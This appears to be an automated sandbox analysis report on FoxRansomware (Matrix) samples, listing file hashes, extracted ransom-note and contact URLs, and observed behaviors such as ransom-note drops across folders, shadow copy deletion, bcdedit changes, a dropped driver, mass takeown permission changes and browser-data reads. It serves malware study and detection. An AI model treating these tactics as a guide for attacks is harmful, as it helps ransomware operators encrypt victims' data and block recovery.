Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
146s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240319-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240319-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\FreeCell\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Recovery\1cc83c02-d10e-11ee-94d5-decc1f73fbe3\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Videos\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Desktop\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\skins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1weu80pa.default-release\settings\main\ms-language-packs\browser\newtab\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Solitaire\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Libraries\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\deploy\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Solitaire\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3492 bcdedit.exe 2416 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 772 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS QvFgQs9v64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" QvFgQs9v64.exe -
Executes dropped EXE 64 IoCs
pid Process 2616 NW9TWHdy.exe 2940 QvFgQs9v.exe 3012 QvFgQs9v64.exe 4068 QvFgQs9v.exe 3112 QvFgQs9v.exe 2836 QvFgQs9v.exe 2068 QvFgQs9v.exe 2312 QvFgQs9v.exe 2912 QvFgQs9v.exe 2108 QvFgQs9v.exe 2920 QvFgQs9v.exe 2816 QvFgQs9v.exe 3508 QvFgQs9v.exe 3624 QvFgQs9v.exe 2552 QvFgQs9v.exe 1296 QvFgQs9v.exe 1108 QvFgQs9v.exe 4076 QvFgQs9v.exe 3976 QvFgQs9v.exe 3968 QvFgQs9v.exe 3920 QvFgQs9v.exe 3808 QvFgQs9v.exe 2032 QvFgQs9v.exe 3540 QvFgQs9v.exe 3868 QvFgQs9v.exe 1688 QvFgQs9v.exe 2948 QvFgQs9v.exe 3076 QvFgQs9v.exe 2128 QvFgQs9v.exe 1572 QvFgQs9v.exe 2260 QvFgQs9v.exe 2232 QvFgQs9v.exe 3112 QvFgQs9v.exe 880 QvFgQs9v.exe 3232 QvFgQs9v.exe 1868 QvFgQs9v.exe 1532 QvFgQs9v.exe 3256 QvFgQs9v.exe 3612 QvFgQs9v.exe 1984 QvFgQs9v.exe 2956 QvFgQs9v.exe 576 QvFgQs9v.exe 3972 QvFgQs9v.exe 1608 QvFgQs9v.exe 1504 QvFgQs9v.exe 3512 QvFgQs9v.exe 2104 QvFgQs9v.exe 564 QvFgQs9v.exe 2776 QvFgQs9v.exe 3620 QvFgQs9v.exe 3520 QvFgQs9v.exe 2804 QvFgQs9v.exe 1648 QvFgQs9v.exe 2512 QvFgQs9v.exe 3224 QvFgQs9v.exe 2008 QvFgQs9v.exe 3740 QvFgQs9v.exe 4060 QvFgQs9v.exe 4048 QvFgQs9v.exe 3580 QvFgQs9v.exe 1808 QvFgQs9v.exe 2184 QvFgQs9v.exe 3796 QvFgQs9v.exe 1268 QvFgQs9v.exe -
Loads dropped DLL 64 IoCs
pid Process 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 2528 cmd.exe 2940 QvFgQs9v.exe 3712 cmd.exe 3092 cmd.exe 4088 cmd.exe 1164 cmd.exe 2464 cmd.exe 2292 cmd.exe 3460 cmd.exe 3972 cmd.exe 2972 cmd.exe 3008 cmd.exe 2440 cmd.exe 1108 cmd.exe 2512 cmd.exe 3904 cmd.exe 2476 cmd.exe 2040 cmd.exe 1936 cmd.exe 1360 cmd.exe 3796 cmd.exe 3720 cmd.exe 1524 cmd.exe 3776 cmd.exe 2004 cmd.exe 2412 cmd.exe 1032 cmd.exe 1412 cmd.exe 2520 cmd.exe 3712 cmd.exe 2712 cmd.exe 1416 cmd.exe 3220 cmd.exe 3092 cmd.exe 3264 cmd.exe 3292 cmd.exe 3184 cmd.exe 2936 cmd.exe 3216 cmd.exe 2860 cmd.exe 3060 cmd.exe 3376 cmd.exe 2800 cmd.exe 1300 cmd.exe 3464 cmd.exe 2796 cmd.exe 3900 cmd.exe 1508 cmd.exe 3644 cmd.exe 3616 cmd.exe 3548 cmd.exe 2596 cmd.exe 2284 cmd.exe 1600 cmd.exe 3956 cmd.exe 3848 cmd.exe 3728 cmd.exe 3360 cmd.exe 1936 cmd.exe 2616 cmd.exe 3812 cmd.exe 3000 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 1656 takeown.exe 2132 takeown.exe 1028 takeown.exe 3388 takeown.exe 4056 takeown.exe 2024 takeown.exe 3652 takeown.exe 2120 takeown.exe 4048 Process not Found 3240 takeown.exe 1052 takeown.exe 3360 takeown.exe 2328 takeown.exe 3444 takeown.exe 2820 takeown.exe 632 takeown.exe 3148 takeown.exe 528 takeown.exe 3116 takeown.exe 4048 takeown.exe 4000 takeown.exe 208 takeown.exe 3716 takeown.exe 2724 takeown.exe 4092 takeown.exe 3044 takeown.exe 3324 takeown.exe 3836 takeown.exe 2536 takeown.exe 3224 takeown.exe 2836 takeown.exe 2984 takeown.exe 888 Process not Found 2292 takeown.exe 3244 takeown.exe 2388 takeown.exe 1504 takeown.exe 2708 Process not Found 3480 Process not Found 3352 takeown.exe 1360 takeown.exe 1512 takeown.exe 2472 takeown.exe 3764 takeown.exe 3404 takeown.exe 3832 takeown.exe 928 takeown.exe 2284 takeown.exe 4084 takeown.exe 1536 takeown.exe 2888 Process not Found 2036 Process not Found 1292 takeown.exe 604 takeown.exe 2636 takeown.exe 2308 takeown.exe 2428 Process not Found 2912 takeown.exe 3092 takeown.exe 668 takeown.exe 2956 takeown.exe 2476 takeown.exe 2120 takeown.exe 3764 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral11/memory/2940-1452-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/files/0x000500000001956d-1123.dat upx behavioral11/memory/3712-5219-0x0000000002000000-0x0000000002077000-memory.dmp upx behavioral11/memory/4068-5326-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4068-5325-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3112-5407-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4088-5789-0x00000000002F0000-0x0000000000367000-memory.dmp upx behavioral11/memory/2836-5884-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2068-5889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2312-6291-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2912-6296-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2108-7212-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2920-7216-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2816-7222-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2068-7227-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3508-7228-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3508-7229-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3624-7304-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2552-7316-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1296-7884-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1108-7890-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4076-7896-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2816-7895-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3976-7901-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3968-7911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3920-7915-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3808-7925-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2032-7930-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3540-7939-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3868-7943-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1688-7948-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2948-7955-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3076-7963-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2128-7968-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1572-7970-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2260-7972-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2260-7971-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2712-7977-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2232-7980-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3112-7981-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/880-7984-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3232-7987-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1868-7994-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1532-7995-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3256-8002-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3612-8003-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1984-8008-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2956-8009-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/576-8011-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3972-8014-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1608-8021-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1504-8022-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3512-8025-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2104-8026-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/564-8027-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2776-8028-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3620-8033-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3520-8034-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2804-8035-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1648-8036-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2512-8040-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3224-8041-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2008-8046-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3740-8048-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Y3HLRHFA\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\5B8DS9TT\desktop.ini 